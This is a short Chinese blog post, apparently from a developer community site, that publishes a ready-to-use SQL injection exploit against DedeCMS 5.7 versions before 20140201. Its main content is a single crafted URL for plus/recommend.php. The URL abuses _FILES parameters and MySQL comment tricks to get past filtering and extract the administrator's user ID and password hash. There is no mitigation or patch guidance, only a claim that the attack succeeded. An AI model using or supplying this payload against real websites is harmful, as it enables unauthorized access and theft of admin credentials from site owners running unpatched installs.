开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

社区首页 >专栏 >DedeCMS 20140201 之前的5.7通杀SQL注入漏洞

DedeCMS 20140201 之前的5.7通杀SQL注入漏洞

原创

V站CEO-西顾

发布于 2018-06-16 21:04:34

1.8K0

发布于 2018-06-16 21:04:34

举报

文章被收录于专栏：V站V站

V站笔记

虽然漏洞有点久远了，但有的时候还能遇见…

0x00 EXP

http://www.dyboy.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'or mid=@`\'`/*!50000union*//*!50000select*/1,2,3,(selectCONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111

0x01 成功案例

利用成功的截图如下

dedecms SQL注入

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

评论

登录后参与评论

0 条评论

热度

最新

LV.

目录

0x00 EXP
0x01 成功案例